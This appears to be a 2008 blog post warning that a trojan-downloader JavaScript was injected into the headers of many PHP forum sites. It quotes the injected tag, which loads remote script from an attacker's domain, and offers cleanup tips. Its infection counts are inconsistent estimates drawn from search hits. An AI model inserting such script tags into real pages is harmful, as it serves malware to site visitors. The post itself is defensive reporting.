Sunday, May 4, 2008

Trojan Downloader Javascript infect more than 297.000 PHP Websites around the World

A friend site is infected and more than 32.800 (result depence how you search) more php based websites mostly on apache server hosted domains around the world with trojan downloader script!

Sample: trojan.jpg

ImageBanana - trojan.jpg


Google result Trojan Downloader Java script infected Domains:
http://www.google.com/search?q=%3Cscript+src%3D%22http%3A%2F%2Fxprmn4u.info%2Ff.js%22%3E%3C%2Fscript

this code someone inject into php forum sites in the header section
script src="http://xprmn4u.info/f.js

MS Windows Live OnCare found it!
Status of Nod32?

What to do as site visitor:
Close webbrowser
Delete / empty Java catch folder
delete / empty Web browser catch folder
reboot

Webmaster:
Save your server access log - analyse post requests to sql + more... source ip address,...

Update within 2h:
http://www.google.com/search?q=xprmn4u.info
Ergebnisse / Search Results 1 - 10 von ungefähr 370.000 für xprmn4u.info
Means about 370.000 Websites infected!!!

The Cross site Trojan Downloader Java Script is hosted by
UcoZ!


Its only 2 months ago as an iFrame-injection attack, redirected users to a malicious site with (ONLY) 165,000 Web sites infections... read more

No comments:

Post a Comment